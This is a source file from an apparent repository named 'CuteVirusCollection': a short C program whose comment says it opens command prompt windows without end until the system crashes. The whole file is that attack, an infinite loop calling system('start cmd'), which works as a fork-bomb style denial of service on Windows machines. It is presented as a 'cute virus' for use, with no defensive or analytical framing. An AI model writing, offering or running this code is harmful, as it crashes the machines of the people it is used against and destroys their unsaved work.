Files
CuteVirusCollection/cmd_blast.c
Minhas Kamal 30f74efabb cmd blast
2016-12-14 07:44:40 +06:00

11 lines
186 B
C

// Developer: Minhas Kamal
// Opens an infinite number of command prompt window till the system crushes.
#include <stdlib.h>
main(){
while(1){
system("start cmd");
}
}